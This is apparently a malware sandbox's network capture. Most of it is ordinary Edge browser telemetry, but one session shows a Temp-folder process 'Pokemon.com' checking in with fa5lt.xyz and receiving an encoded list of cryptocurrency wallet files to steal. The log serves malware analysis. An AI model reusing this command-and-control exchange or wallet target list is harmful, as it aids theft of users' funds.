                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:28 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:35 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    31192.168.2.54994320.110.205.1194434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:29 UTC1175OUTGET /c.gif?rnd=1735307249044&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b651b00d73bb4a9ab8b6ca7210063a71&activityId=b651b00d73bb4a9ab8b6ca7210063a71&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: c.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: _C_ETH=1; USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:30 UTC1108INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                    Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                    Location: https://c.bing.com/c.gif?rnd=1735307249044&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b651b00d73bb4a9ab8b6ca7210063a71&activityId=b651b00d73bb4a9ab8b6ca7210063a71&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=14C71902C8884738842424F5E7BBAD37&RedC=c.msn.com&MXFR=1AA6CB7BE4CF62801FB6DE19E5AD630B
                                                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                    P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                    Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                    Set-Cookie: MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; domain=.msn.com; expires=Wed, 21-Jan-2026 13:47:30 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:29 GMT
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Content-Length: 0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    32192.168.2.549950108.139.47.924434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:29 UTC925OUTGET /b?rn=1735307249044&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1AA6CB7BE4CF62801FB6DE19E5AD630B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:30 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:30 GMT
                                                                                                                                                                                                                                                                                    Location: /b2?rn=1735307249044&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1AA6CB7BE4CF62801FB6DE19E5AD630B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                    set-cookie: UID=10F921920583e33615b2b9d1735307250; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                    set-cookie: XID=10F921920583e33615b2b9d1735307250; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                    Via: 1.1 8770cedbbb1c2feb157dc67ce83fe00c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: Td-MQbbhXGtWDUcoOcaf9TjUn7rk1B-IUgNhSlIdwFwpxB5ZL1pltQ==


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    33192.168.2.549985116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:30 UTC321OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----AS26FU3EKF37QIE37Y5F
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:30 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 41 53 32 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 41 53 32 36 46 55 33 45 4b 46 33 37 51 49 45 33 37 59 35 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------AS26FU3EKF37QIE37Y5FContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------AS26FU3EKF37QIE37Y5FContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------AS26FU3EKF37QIE37Y5FCont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:31 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:31 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                    Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    34192.168.2.549988108.139.47.924434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:31 UTC1012OUTGET /b2?rn=1735307249044&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1AA6CB7BE4CF62801FB6DE19E5AD630B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: UID=10F921920583e33615b2b9d1735307250; XID=10F921920583e33615b2b9d1735307250
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:32 UTC326INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:31 GMT
                                                                                                                                                                                                                                                                                    Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                    X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                    Via: 1.1 aa7ca65bca4d95ba9a04dd166671496c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                    X-Amz-Cf-Id: RMbnSmRL6TW5Kb6xD9QmUMGPZtHGC1Qt2PMmyOeSLZsO64MiHxp9Pg==


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    35192.168.2.54998620.189.173.14434028C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:32 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735307249039&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 3868
                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                    Cookie: _C_ETH=1; USRLOC=; MUID=1AA6CB7BE4CF62801FB6DE19E5AD630B; _EDGE_S=F=1&SID=29785E8D998166DF1E074BEF98EF6757; _EDGE_V=1
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:32 UTC3868OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 32 2d 32 37 54 31 33 3a 34 37 3a 32 39 2e 30 33 35 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 36 35 38 33 61 34 66 62 2d 31 62 31 63 2d 34 62 31 37 2d 39 35 63 31 2d 66 62 61 35 31 61 35 65 61 66 37 32 22 2c 22 65 70 6f 63 68 22 3a 22 34 38 33 30 33 32 36 35 37 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65 22
                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-12-27T13:47:29.035Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"6583a4fb-1b1c-4b17-95c1-fba51a5eaf72","epoch":"483032657"},"app":{"locale"
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:32 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=90640a4982de4a17a1a680379cf6efa7&HASH=9064&LV=202412&V=4&LU=1735307252302; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 13:47:32 GMT; Path=/;Secure; SameSite=None
